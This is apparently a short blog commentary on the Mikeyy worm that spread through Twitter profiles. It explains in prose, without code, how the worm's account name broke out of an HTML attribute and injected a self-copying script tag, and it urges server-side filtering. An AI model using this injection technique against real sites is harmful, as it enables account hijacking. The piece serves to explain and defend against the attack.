Its now the fourth wave of attacks on twitter … the Mikeyy-worm not only infests all users that watch an infected Tweet via the web interface, it also laughs about Twitter. Beside links to infected profiles, it tweets “Don’t blame mikeyy, its twitters fault” or “Twitter hire Mikeyy” … a clear statement, that Twitter’s programmers don’t seem to know enough about cross-side-scripting.
How does the worm work? Easy: Cross-side-scripting (XSS). The name of the account closes the Tag with “> and then opens a <script>-Tag that uses JavaScript to include itself into the name of the watching logged in Twitter-User. This works, when the code is executed by a browser, which happens as soon as you use the web interface of twitter – as the name of the Tweep is shown there.
How to solve this? Twitter needs to filter all user-entered forms from malicious JavaScript-code when its submitted to their server … basic knowledge one should guess. Well, and they need to strip the Script from the existing infected Tweets. Till that happens, I’d advise everyone to not use the web interface of twitter but stick to other twitter-clients.